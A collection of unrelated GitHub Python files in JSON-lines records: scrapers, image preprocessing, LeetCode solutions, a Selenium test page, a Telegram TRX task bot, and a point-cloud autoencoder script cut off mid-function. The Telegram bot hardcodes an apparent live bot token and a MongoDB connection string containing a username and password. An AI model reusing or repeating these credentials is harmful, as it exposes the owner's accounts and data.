genome_acid=row['Prediction_Top_Residue'],\n genome_score=int(row['Prediction_Top_Score']),\n genome_modification=row['Prediction_Modifications'],\n graph_acid=row['Matched_Residue'],\n graph_score=int(row['Matched_Residue_Score']),\n nerpa_score=float(row['Nerpa_Score']),\n rban_graph_id=int(row['Monomer_Idx']),\n rban_acid_code=row['Monomer_Code'],\n rban_acid=row['Monomer_Residue'],\n rban_modification=row['Monomer_Modifications'],\n )\n\n\ndef parse_compound_match(match_file_content: str):\n match_file_content = match_file_content.strip()\n matches = list(map(lambda x: x.strip(), match_file_content.split('\\n\\n\\n')))\n\n max_score = None\n top_df = None\n top_name = None\n\n dfs = []\n bgcs = []\n scores = []\n\n for m in matches:\n match_lines = m.split('\\n')\n compound_name = match_lines[0]\n predictors_path = match_lines[1]\n bgc = \"BGC\" + re.findall(\"BGC([0-9]*)_\", predictors_path)[0]\n\n score = float(match_lines[2].strip().split(' ')[-1])\n alignment = match_lines[3]\n tsv_report = '\\n'.join(match_lines[4:])\n df = pd.DataFrame([x.split(' ') for x in tsv_report.split('\\n')[1:]],\n columns=tsv_report.split('\\n')[0].split(' '))\n dfs.append(df)\n bgcs.append(bgc)\n scores.append(score)\n\n return dfs, bgcs, scores\n","repo_name":"pavlov200912/nrp-generation","sub_path":"domain/match/compound_match.py","file_name":"compound_match.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38907800395","text":"import sys\r\n\r\nimport tweepy\r\nfrom unshortenit import UnshortenIt\r\n\r\nconsumer_key = \"\"\r\nconsumer_secret = \"\"\r\naccess_key = \"\"\r\naccess_secret = \"\"\r\n\r\n#method to get a user's last 
tweets\r\ndef get_tweets(username):\r\n\r\n\tauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n\tauth.set_access_token(access_key, access_secret)\r\n\tapi = tweepy.API(auth)\r\n\r\n\t#set count to however many tweets you want\r\n\tnumber_of_tweets = 500\r\n\r\n\t#get tweets\r\n\tfor tweet in tweepy.Cursor(api.user_timeline, screen_name = username).items(number_of_tweets):\r\n #create array of tweet information: username, tweet id, date/time, text\r\n\t\tif(\"https://t.co/\" in tweet.text):\r\n\t\t\tindex = (tweet.text).index('https://t.co')\r\n\t\t\tt_url = (tweet.text)[index:(index+24)]\r\n\t\t\tunshortener = UnshortenIt()\r\n\t\t\turl = unshortener.unshorten(t_url)\r\n\t\t\tif(\"open.spotify\" in url):\r\n\t\t\t\tprint(url)\r\n\t\t\t#print(url)\r\n\t\t#print (tweet.text)\r\n\r\n#if we're running this as a script\r\nif __name__ == '__main__':\r\n\r\n #get tweets for username passed at command line\r\n if len(sys.argv) == 2:\r\n get_tweets(sys.argv[1])\r\n else:\r\n print (\"Error: enter one username\")\r\n","repo_name":"hhptl/spotify-tweets","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"7842171305","text":"# This example shows how to read a tile file from the Sentinel 2 bucket\n# and show it\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport boto3\nimport mgrs\nimport re\nfrom PIL import Image\n\nImage.MAX_IMAGE_PIXELS = 1000000000\n\ns3 = boto3.resource('s3', region_name='us-east-2')\n\nlongitude = 37.593947\nlatitude = 55.731979\n\nm = mgrs.MGRS()\n\nmgrs = m.toMGRS(latitude, longitude).decode('cp1252')\n\ns = re.search('(\\d+)([^\\d])([^\\d]{2})(\\d{5})(\\d{5})', mgrs)\n\nUTM = s.group(1)\nLatitudeBand = s.group(2)\nSquare = s.group(3)\n\nbucket = s3.Bucket('sentinel-s2-l1c')\n\ntilesdir = 'tiles/' + UTM + '/'+ LatitudeBand + '/' + Square + '/'\n\ndatestring = '2017/5/10/0/'\n\nfilename = 'tileInfo.json'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'metadata.xml'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'B02.jp2'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'B03.jp2'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'B04.jp2'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\n\nimg_blue = np.divide(mpimg.imread('B02.jp2'), 65535)\nimg_green = np.divide(mpimg.imread('B03.jp2'), 65535)\nimg_red = np.divide(mpimg.imread('B04.jp2'), 65535)\nimg = np.dstack((img_red,img_green,img_blue))\n\n\nimgplot = plt.imshow(img)\nplt.show(imgplot)\n\npass","repo_name":"dims12/Sentinel2-Approach01","sub_path":"tries/try06.py","file_name":"try06.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"69856347961","text":"# https://leetcode.com/problems/3sum/\n\ndef threeSum(nums):\n # Sorting the numbers makes this easier.\n nums.sort()\n res = []\n for i in range(len(nums)):\n a = nums[i]\n # If the index is not the first index, check if the one before it is the same value.\n # If it is, that means we can skip this loop because we already did the calculation\n if i > 0 and nums[i - 1] == a:\n continue\n\n # Create two pointers, one starting at the 
next number, the other starting at the end of the array.\n        l = i + 1\n        r = len(nums) - 1\n        # While the left is always less than the right...\n        while l < r:\n            # Get the values at l and r and add them with the current num\n            b = nums[l]\n            c = nums[r]\n            s = a + b + c\n            # If the sum is 0 we have a hit, so we can add it to the result array if it's not already in there.\n            if s == 0:\n                if [a, b, c] not in res:\n                    res.append([a, b, c])\n                # Move both pointers inward so the loop keeps making progress\n                l += 1\n                r -= 1\n            # If the sum is too big, we decrement the right side by one\n            elif s > 0:\n                r -= 1\n            # Too small, we increase l by one\n            else:\n                l += 1\n    return res\n\n\n# threeSum appends to this module-level list, so it must exist before the call\nres = []\nn = [-1, 0, 1, 2, -1, -4]\nres = threeSum(n)\nprint(res)\n","repo_name":"juggernautrises/grindcode","sub_path":"python/15_3sum.py","file_name":"15_3sum.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"41051999400","text":"import json\nimport logging\nimport os\nimport time\nfrom pathlib import Path\nfrom reddit_service import praw_service as praw\nfrom reddit_resource import subreddits as subs\nfrom producer import publish_stock\n\nlogging.basicConfig(level=logging.DEBUG)\n\ndef test_1_scan():\n    reddit = praw.praw_connection()\n    subreddit = subs.subreddit_list()[0]\n    top25Submissions = []\n    top25 = reddit.subreddit(subreddit).hot(limit=25)\n    for submission in top25:\n        if submission.stickied:\n            continue\n        comments = []\n        curr = reddit.submission(submission)\n        curr.comments.replace_more(limit=1, threshold=0)\n        for comment in curr.comments.list(): # Create a list of all comments to eliminate hierarchy\n            comments.append({\n                \"comment_author\": comment.author_fullname if hasattr(comment, 'author_fullname') else \"null\",\n                \"body\": comment.body,\n                \"created_utc\": comment.created_utc,\n                \"edited\": comment.edited,\n                \"id\": comment.id,\n                \"is_root\": comment.is_root,\n                \"is_submitter\": comment.is_submitter,\n                \"permalink\": comment.permalink,\n                \"score\": comment.score,\n                \"ups\": comment.ups\n            })\n        top25Submissions.append({\n            \"id\": submission.id,\n            \"title\": submission.title,\n            \"flair\": submission.link_flair_text,\n            \"subreddit\": submission.subreddit_name_prefixed,\n            \"created_utc\": submission.created_utc,\n            \"upvote\": submission.ups,\n            \"score\": submission.score,\n            \"upvote_ratio\": submission.upvote_ratio,\n            \"self_text\": submission.selftext,\n            \"self_url\": submission.url,\n            \"permalink\": submission.permalink,\n            \"shortlink\": submission.shortlink,\n            \"author\": submission.author_fullname if hasattr(submission, 'author_fullname') else \"null\",\n            \"comment_count\": submission.num_comments,\n            \"comments\": comments\n        })\n        publish_stock(top25Submissions, '','scraped_data')\n        create_submission_json(top25Submissions, subreddit)\n        break\n\n\ndef create_submission_json(submissions: list, subreddit):\n    path = \"../data_collected/reddit/\" + subreddit\n    file = str(time.time()) + \".json\"\n    Path(path).mkdir(parents=True, exist_ok=True)\n\n    with open(os.path.join(path, file), \"w\") as f:\n        json.dump(submissions, f)\n\n    os.remove(path + \"/\" + file)\n\ntest_1_scan()\n","repo_name":"Sentmint/CrawlScrape","sub_path":"reddit/testing/reddit_test.py","file_name":"reddit_test.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"24895162839","text":"import os\nimport random\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\n\ndef process_isic(\n    dim=(352, 
352),\n    save_dir=\"./processed/isic2016\",\n    image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n    mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n    save_as_npy=True,\n):\n\n    image_path_list = os.listdir(image_dir_path)\n    mask_path_list = os.listdir(mask_dir_path)\n\n    image_path_list = list(filter(lambda x: x[-3:] == \"jpg\", image_path_list))\n    mask_path_list = list(filter(lambda x: x[-3:] == \"png\", mask_path_list))\n\n    image_path_list.sort()\n    mask_path_list.sort()\n\n    print(len(image_path_list), len(mask_path_list))\n\n    # ISBI Dataset\n    for image_path, mask_path in tqdm(zip(image_path_list, mask_path_list)):\n        if image_path[-3:] == \"jpg\":\n            # print(image_path)\n            assert (\n                os.path.basename(image_path)[:-4].split(\"_\")[1]\n                == os.path.basename(mask_path)[:-4].split(\"_\")[1]\n            )\n            _id = os.path.basename(image_path)[:-4].split(\"_\")[1]\n            image_path = os.path.join(image_dir_path, image_path)\n            mask_path = os.path.join(mask_dir_path, mask_path)\n            image = cv2.imread(image_path)\n            mask = cv2.imread(mask_path)\n\n            image_new = cv2.resize(image, dim, interpolation=cv2.INTER_CUBIC)\n            image_new = np.array(image_new, dtype=np.uint8)\n            mask_new = cv2.resize(mask, dim, interpolation=cv2.INTER_NEAREST)\n            mask_new = cv2.blur(mask_new, (3, 3))\n            mask_new = cv2.cvtColor(mask_new, cv2.COLOR_BGR2GRAY)\n            # mask_new = np.array(mask_new, dtype=np.uint8)\n\n            save_dir_path_image = save_dir + \"/Image\"\n            os.makedirs(save_dir_path_image, exist_ok=True)\n\n            save_dir_path_mask = save_dir + \"/Label\"\n            os.makedirs(save_dir_path_mask, exist_ok=True)\n\n            # #print(image_new.shape)\n            if save_as_npy:\n                np.save(os.path.join(save_dir_path_image, _id + \".npy\"), image_new)\n                np.save(os.path.join(save_dir_path_mask, _id + \".npy\"), mask_new)\n            else:\n                # Write the image to the Image dir and the mask to the Label dir\n                cv2.imwrite(\n                    os.path.join(save_dir_path_image, \"ISIC_\" + _id + \".jpg\"), image_new\n                )\n                cv2.imwrite(\n                    os.path.join(save_dir_path_mask, \"ISIC_\" + _id + \".jpg\"), mask_new\n                )\n\n\ndef process_ph2():\n    PH2_images_path = \"/data2/cf_data/skinlesion_segment/PH2_rawdata/PH2_Dataset_images\"\n\n    path_list = os.listdir(PH2_images_path)\n    path_list.sort()\n\n    for path in path_list:\n        image_path = os.path.join(\n            PH2_images_path, path, path + \"_Dermoscopic_Image\", path + \".bmp\"\n        )\n        label_path = os.path.join(\n            PH2_images_path, path, path + \"_lesion\", path + \"_lesion.bmp\"\n        )\n        image = plt.imread(image_path)\n        label = plt.imread(label_path)\n        label = label[:, :, 0]\n\n        dim = (512, 512)\n        image_new = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n        label_new = cv2.resize(label, dim, interpolation=cv2.INTER_AREA)\n\n        image_save_path = os.path.join(\n            \"/data2/cf_data/skinlesion_segment/PH2_rawdata/PH2/Image\", path + \".npy\"\n        )\n        label_save_path = os.path.join(\n            \"/data2/cf_data/skinlesion_segment/PH2_rawdata/PH2/Label\", path + \".npy\"\n        )\n\n        np.save(image_save_path, image_new)\n        np.save(label_save_path, label_new)\n\n\nif __name__ == \"__main__\":\n    process_isic(\n        dim=(512, 512),\n        save_dir=\"./processed/isic2016/Train\",\n        image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n        mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n    )\n    process_isic(\n        dim=(512, 512),\n        save_dir=\"./processed/isic2016/Test\",\n        image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n        mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n    )\n    process_isic(\n        dim=(512, 512),\n        save_dir=\"./processed/isic2016/Validation\",\n        
image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n        mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n    )\n","repo_name":"HiroForYou/Vision-2-Transformers","sub_path":"ViT-to-melanoma/src/process_resize.py","file_name":"process_resize.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"24878474078","text":"from collections import Counter \n\nclass MyCounter:\n\n    @classmethod\n    def main(cls,args):\n        seq = [1,1,2,2,3,3,4,4,4,4]\n\n        mycounter = Counter(seq)\n\n        print(mycounter)\n        print(mycounter.get(3))\n        \n        mycounter.pop(4)\n        print(4 in mycounter)\n\n        mycounter[5] += 1\n        mycounter[5] += 1\n\n        print(mycounter)\n\nif __name__ == '__main__':\n    import sys\n    MyCounter.main(sys.argv)\n","repo_name":"natcobbinah/Python_prog","sub_path":"python_problem_solving - Hermant Jain/dsa/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"27297800902","text":"def isValid(s):\n    hist = [0] * (ord('z') - ord('a') + 1)\n    for c in s:\n        hist[ord(c)-ord('a')] += 1\n    hist = [n for n in hist if n > 0]\n\n    d = dict()\n    for h in hist:\n        if (d.get(h) is None):\n            d[h] = 1\n        else:\n            d[h] += 1\n\n    keys = sorted(d.keys())  # sort so keys[0] is always the smaller frequency\n    if (len(keys) == 1):\n        return \"YES\"\n    elif (len(keys) > 2):\n        return \"NO\"\n    else:\n        if ((keys[1] == keys[0] + 1) and (d[keys[1]] == 1)):\n            return \"YES\"\n        elif ((keys[0] == 1) and (d[keys[0]] == 1)):\n            return \"YES\"\n        else:\n            return \"NO\"\n","repo_name":"larumbe/challenges","sub_path":"hackerrank/interview/sherlock.py","file_name":"sherlock.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"40917289731","text":"import json, csv,sys\n\nOUT = sys.argv[1] if len(sys.argv) > 1 else \"stages.csv\"\nLIMIT = int(sys.argv[2]) if len(sys.argv) > 2 else None\n\ndetails = json.load(open('data/enriched.json'))\n\nprint('files loaded')\n\ndata = details\n\n######## STAGES.CSV\n\nout = open('data/'+OUT, 'w', newline='')\nw = csv.writer(out)\n\nheader = list(sorted(data[0].keys()))\nprint(header)\nw.writerow(header)\n\ndef get(s, key):\n    if key in ('done','confidentiel'):\n        return 'x' if s[key] else ''\n    return s.get(key)\n\nfor i,attrs in enumerate(data):\n    if LIMIT and i > LIMIT:\n        break\n    w.writerow([get(attrs,x) for x in header])\n\nprint(\"stages.csv done\")","repo_name":"mdamien/internships","sub_path":"extraction/make_csv.py","file_name":"make_csv.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"1554229126","text":"# This is a sample Python script.\r\n\r\n# Press Shift+F10 to execute it or replace it with your code.\r\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\r\nimport random\r\nimport pymongo\r\nimport telegram\r\nfrom telegram.ext import *\r\nfrom telegram import ReplyKeyboardMarkup , InlineKeyboardMarkup , InlineKeyboardButton\r\n\r\nclient = pymongo.MongoClient(\"mongodb+srv://pugalkmc:pugalkmc@cluster0.ey2yh.mongodb.net/mydb?retryWrites=true&w=majority\")\r\nmydb = client.get_default_database()\r\n\r\nbot = telegram.Bot(token=\"5394324389:AAGvCQN8ogbnwj1MStLHmvu7Kb9e3uQiF_4\")\r\n\r\ndef main_buttons(update, context):\r\n    reply_keyboard = [['Do Task💸', 
'', 'Create Task📜'], ['Balance⚖', 'Deposit➕'], ['Referal link📎', 'More❕']]\r\n\r\n update.message.reply_text(\"Main Menu\",\r\n reply_markup=ReplyKeyboardMarkup(reply_keyboard, resize_keyboard=True,\r\n one_time_keyboard=True))\r\n\r\n\r\ndef start(update, context):\r\n sender = update.message.reply_text\r\n chat_id = update.message.chat_id\r\n username = update.message.chat.username\r\n text = update.message.text\r\n if str(username) == \"None\":\r\n sender(\"No username found for your account\")\r\n sender(\"Please set username for your telegram\\n1)Go telegram account settings\\n2)Click username\\n3)Set unique and simplified username\")\r\n else:\r\n checking_exist = mydb[\"people\"]\r\n bot.sendMessage(chat_id=chat_id, text =\"This KMC TRX earning bot\"\r\n \"\\nYou can earn TRX by doing tasks\"\r\n \"\\nAlso You can create task for other to do\")\r\n\r\n main_buttons(update, context)\r\n for i in checking_exist.find({}):\r\n if username == i[\"username\"]:\r\n break\r\n else:\r\n rand_num = random.randrange(11023648,12023648)\r\n rand_text = random.choice('qwertyuiopasfghjklzxcvbnm')\r\n link = \"https://telegram.me/earn_trx_ind_bot?start=\"+str(rand_num)+rand_text\r\n checking_exist.insert_one({\"_id\": chat_id, \"username\": username , \"referal\":link , \"ref_count\":0})\r\n bot.sendMessage(chat_id=1291659507, text=\"New user found @\" + str(username))\r\n referal(text, username)\r\n\r\ndef referal(text , username):\r\n referal = text.replace(\"/start \", '')\r\n if len(referal) > 0:\r\n ref = mydb[\"people\"]\r\n link = \"https://telegram.me/earn_trx_ind_bot?start=\"+str(referal)\r\n try:\r\n get = ref.find_one({\"referal\": link})\r\n get_invitee = get[\"_id\"]\r\n get_count = get[\"ref_count\"]\r\n ref.update_one({\"_id\": get_invitee}, {\"$set\": {\"ref_count\": get_count+1}})\r\n bot.sendMessage(chat_id=get_invitee, text=f\"You got new referal: @{username}\")\r\n except:\r\n get = ref.find_one({\"referal\":\"https://telegram.me/earn_trx_ind_bot?start=11299293i\"})\r\n get_invitee = get[\"_id\"]\r\n get_count = get[\"ref_count\"]\r\n ref.update_one({\"_id\": get_invitee}, {\"$set\": {\"ref_count\": get_count+1}})\r\n\r\ndef msg_hand(update, context):\r\n chat_id = update.message.chat_id\r\n username = update.message.chat.username\r\n sender = update.message.reply_text\r\n text = update.message.text\r\n if 'Do Task💸' == text:\r\n task_list(update, context)\r\n elif 'Create Task📜' == text:\r\n pass\r\n elif 'Balance⚖' == text:\r\n pass\r\n elif 'Deposit➕' == text:\r\n bot.sendMessage(\"This is deposit option\")\r\n elif 'Referal link📎' == text:\r\n get_link = mydb['people']\r\n get = get_link.find_one({\"_id\":chat_id})\r\n bot.sendMessage(chat_id=chat_id, text=f\"Your referal link:\\n{get['referal']}\")\r\n elif \"Withdraw➕\" == text:\r\n pass\r\n\r\n if text == \"More❕\":\r\n reply_keyboard = [[\"Rules\", \"About\"], [\"Rank\", \"Support\"], [\"Withdraw➕\",\"Back↩\"]]\r\n update.message.reply_text(\"Use below buttons for quick access\",\r\n reply_markup=ReplyKeyboardMarkup(reply_keyboard, resize_keyboard=True,\r\n one_time_keyboard=True))\r\n elif text == \"Back↩\":\r\n # update.message.reply_text(text = 'test')\r\n main_buttons(update, context)\r\n\r\n\r\ndef do_task(update, context):\r\n text = update.message.text\r\n text = text.replace(\"/\",'')\r\n find_task = mydb[\"tasks\"]\r\n get = find_task.find_one({\"cmd_id\":text})\r\n keyboard = [\r\n [InlineKeyboardButton(\"Send Proof📥\", callback_data=f\"{get['cmd_id']}\")],\r\n [InlineKeyboardButton(\"Skip⏩\", 
callback_data=\"skip\")]\r\n ]\r\n reply_markup = InlineKeyboardMarkup(keyboard, one_time_keyboard=True , resize_keyboard=True)\r\n bot.sendMessage(chat_id = update.message.chat_id, text = f\"Task id : /{get['cmd_id']}\\n\"\r\n f\"Title: {get['title']}\\n\"\r\n f\"Reward: {get['reward']} TRX\\n\", reply_markup=reply_markup)\r\n\r\n return SELECTING_COMMAND\r\n\r\ndef task_list(update , context):\r\n chat_id = update.message.chat_id\r\n tasks_list = mydb[\"tasks\"]\r\n list1 = []\r\n total = 0\r\n for i in tasks_list.find({}):\r\n total += 1\r\n text = f\"Task No: {total}\\n\" \\\r\n f\"Title: {i['title']}\\n\" \\\r\n f\"Reward: {i['reward']} TRX\\n\" \\\r\n f\"Task id : /{i['cmd_id']}\"\r\n list1.append(text)\r\n\r\n update.message.reply_text(\"Total task found:{0}\\n\\n{1}\\n\\n\".format(total, '\\n'.join(x for x in list1)))\r\n\r\n\r\nSELECTING_COMMAND = 1\r\n\r\ndef inline(update, CallbackContext):\r\n print(\"clicked\")\r\n button_text = update.callback_query.data\r\n if button_text == \"skip\":\r\n pass\r\n else:\r\n update.effective_message.reply_text(\"Now send your task proof\")\r\n# bot.answer_callback_query(callback_query_id=call.id, text='you disliked it!')\r\n return 1\r\n\r\ndef com():\r\n tasks_list = mydb[\"tasks\"]\r\n task = [\"empty\"]\r\n for i in tasks_list.find({}):\r\n task.append(i[\"cmd_id\"])\r\n return task\r\n\r\ndef main():\r\n updater = Updater(\"5394324389:AAGvCQN8ogbnwj1MStLHmvu7Kb9e3uQiF_4\", use_context=True)\r\n dp = updater.dispatcher\r\n dp.add_handler(CommandHandler(\"start\", start))\r\n dp.add_handler(CommandHandler(com(), do_task))\r\n dp.add_handler(MessageHandler(Filters.text, msg_hand))\r\n dp.add_handler(CallbackQueryHandler(inline))\r\n print(\"Bot started\")\r\n updater.start_polling()\r\n updater.idle()\r\n\r\n\r\nmain()\r\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\r\n","repo_name":"pugalkmc/ad_bot_01","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16970952620","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def searchBST(self, root, val):\n \"\"\"\n :type root: TreeNode\n :type val: int\n :rtype: TreeNode\n \"\"\"\n return self.sol_2(root, val)\n\n def sol_1(self, root, val):\n while root:\n if root.val == val:\n return root\n elif root.val < val:\n root = root.right\n elif root.val > val:\n root = root.left\n\n # python 不写返回值就是None, 不需要这句\n # return None\n\n def sol_2(self, root, val):\n # 排除root为None的情况\n if not root:\n return None\n\n if root.val > val:\n return self.sol_2(root.left, val)\n elif root.val < val:\n return self.sol_2(root.right, val)\n else:\n return root\n\n\n\n\n\n\n","repo_name":"slimbloody/Leetcode","sub_path":"Python/700_Search_in_a_Binary_Search_Tree.py","file_name":"700_Search_in_a_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37063759667","text":"from datetime import datetime, timedelta\nfrom time import sleep\n\nfrom selenium.webdriver.common.by import By\n\nfrom test.common.page import Page\nfrom test.page.pro1_rz_pages.rz_login_page import RZLoginPage\nfrom utils.config import Config\n\n\nclass reApplyLocators(Page):\n \"\"\"\n 人资系统:加班申请界面使用的控件定位内容\n \"\"\"\n re_Apply_button = 
(By.XPATH,\"//img[starts-with(@id,'vp_hr_portal_myApply_web_JGImage5')]\")#调动申请按钮\n re_Imp_button = (By.XPATH,\"//*[contains(text(),'调入部门')]\")#调入部门弹框\n re_Choose_department = (By.XPATH, \"//*[contains(text(),'企业管理部')]\") # 选择调入的部门\n re_Imp_comfirm = (By.XPATH, \"//*[contains(text(),'确认')]\") # 调入部门确定按钮\n re_Imp_button_1 = (By.XPATH, \"//*[contains(text(),'调入职位')]\") # 调入职位弹框\n re_Imp_position = (By.XPATH, \"//*[contains(text(),'副总裁')]\") #调入职位\n re_Imp_comfirm_2 = (By.XPATH, \"//*[contains(text(),'确定')]\") # 调入职位确定按钮\n re_Reason = (By.XPATH, \"//textarea[@name='moveReason' and @class='JGFormTextError']\") #调动原因\n re_Add_button = (By.XPATH, \"//*[contains(text(),'新增')]\") # 新增按钮\n re_Deliver = (By.XPATH, \"//table[@class='listTable' and @width='610']/tbody/tr/td[2]\") #交接事项名称\n re_Deliver_IN = (By.XPATH, \"//input[@type='TEXT'and @name='contentName']\") # 交接事项内嵌框\n re_Deliver_content = (By.XPATH, \"//table[@class='listTable' and @width='610']/tbody/tr/td[3]\") #具体交接内容\n re_Deliver_content_IN = (By.XPATH, \"//input[@type='TEXT'and @name='content']\") # 具体交接内容内嵌框\n re_Submit_button = (By.XPATH, \"//*[contains(text(),'暂存')]\") # 暂存按钮\n\n\n\n def enter_reApply_button(self):\n '''调动申请按钮'''\n try:\n self.find_element(*self.re_Apply_button).click()\n except Exception as e:\n print('调动申请按钮未找到,原因%s'%e)\n\n def reApply_click_depart(self):\n '''点击调入部门'''\n try:\n self.find_element(*self.re_Imp_button).click()\n except Exception as e:\n print('选择调入部门按钮未找到,原因%s'%e)\n\n def reApplydepart(self):\n '''选择调入部门'''\n try:\n self.find_element(*self.re_Choose_department).click()\n self.find_element(*self.re_Imp_comfirm).click()\n except Exception as e:\n print('选择调入部门按钮未找到,原因%s'%e)\n\n def reApplyposition(self):\n '''输入调入职位'''\n try:\n self.find_element(*self.re_Imp_button_1).click()\n sleep(3)\n self.find_element(*self.re_Imp_position).click()\n self.find_element(*self.re_Imp_comfirm_2).click()\n except Exception as e:\n print('调入职位按钮未找到,原因%s' % e)\n\n def reApplyreason(self):\n '''输入调动原因'''\n return self.find_element(*self.re_Reason).send_keys(u'测试调动申请')\n\n def reApply_add(self):\n '''新增操作'''\n return self.find_element(*self.re_Add_button).click()\n\n def reApply_Deliver(self):\n '''输入交接事项名称'''\n try:\n self.find_element(*self.re_Deliver).click()\n self.find_element(*self.re_Deliver).click()\n self.find_element(*self.re_Deliver_IN).send_keys(u\"测试交接事项名称\")\n except Exception as e:\n print('输入交接事项名称未找到,原因%s' % e)\n\n def reApply_Deliver_content(self):\n '''输入具体交接内容'''\n try:\n self.find_element(*self.re_Deliver_content).click()\n self.find_element(*self.re_Deliver_content).click()\n self.find_element(*self.re_Deliver_content_IN).send_keys(u\"测试具体交接内容\")\n except Exception as e:\n print('具体交接内容未找到,原因%s' % e)\n\n def reApply_Submit(self):\n '''暂存按钮'''\n try:\n self.find_element(*self.re_Submit_button).click()\n except Exception as e:\n print('无法定位暂存按钮 %s' %e)\n\nif __name__ == '__main__':\n URL = Config().get('URL')\n page = RZLoginPage(browser_type='Chrome').get(URL, maximize_window=False)\n page.userlogin()\n result = reApplyLocators(page)\n result.enter_reApply_button()\n sleep(2)\n result.reApply_click_depart()\n sleep(2)\n result.reApplydepart()\n sleep(4)\n result.reApplyposition()\n sleep(2)\n result.reApplyreason()\n sleep(2)\n result.reApply_add()\n sleep(2)\n result.reApply_Deliver()\n sleep(2)\n result.reApply_Deliver_content()\n sleep(2)\n 
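# A sketch of an explicit-wait alternative to the fixed sleep() calls used throughout this script; it assumes selenium's standard WebDriverWait/expected_conditions API and a hypothetical `page.driver` handle on RZLoginPage, so it is left commented out:\n    # from selenium.webdriver.support.ui import WebDriverWait\n    # from selenium.webdriver.support import expected_conditions as EC\n    # WebDriverWait(page.driver, 10).until(\n    #     EC.element_to_be_clickable(reApplyLocators.re_Submit_button))\n    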
result.reApply_Submit()\n\n\n\n\n\n\n\n\n","repo_name":"Jacessw/Test_rz","sub_path":"test/page/pro1_rz_pages/rz_reApply_page.py","file_name":"rz_reApply_page.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30788051603","text":"\"\"\"\nThe purpose of this strategy is to train an AE on the reconstruction task, in order to learn\na feature representation of the input data. \nThe encoded features are then used as input to a classifier.\n\nWe first test the pointcloud dataset: folding net as AE for point cloud reconstruction\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nimport warnings \nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os, glob\nfrom tqdm import tqdm\n\n#DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nDEVICE = torch.device(\"cpu\")\n\ndef train_one_epoch(train_loader, model, optimizer, loss_fn, model_name):\n losses = []\n for ref_cloud in tqdm(train_loader):\n ref_cloud = ref_cloud[0] # the second element in the list is the label, but we dont need it now \n ref_cloud = ref_cloud.to(DEVICE)\n optimizer.zero_grad()\n if model_name == 'convAE':\n batch_size = ref_cloud.shape[0]\n decoded, encoded = model(ref_cloud, batch_size)\n else:\n decoded, encoded = model(ref_cloud)\n # get_loss is a function of net\n loss = loss_fn(ref_cloud, decoded)\n # loss = model.get_loss(ref_cloud, decoded)\n loss.backward()\n optimizer.step()\n losses.append(loss.item())\n\n return np.mean(losses)\n\n\ndef test_one_epoch(test_loader, model, loss_fn, model_name):\n model.eval()\n losses = []\n\n with torch.no_grad():\n for ref_cloud in tqdm(test_loader):\n ref_cloud = ref_cloud[0]\n ref_cloud = ref_cloud.to(DEVICE)\n\n if model_name == 'convAE':\n batch_size = 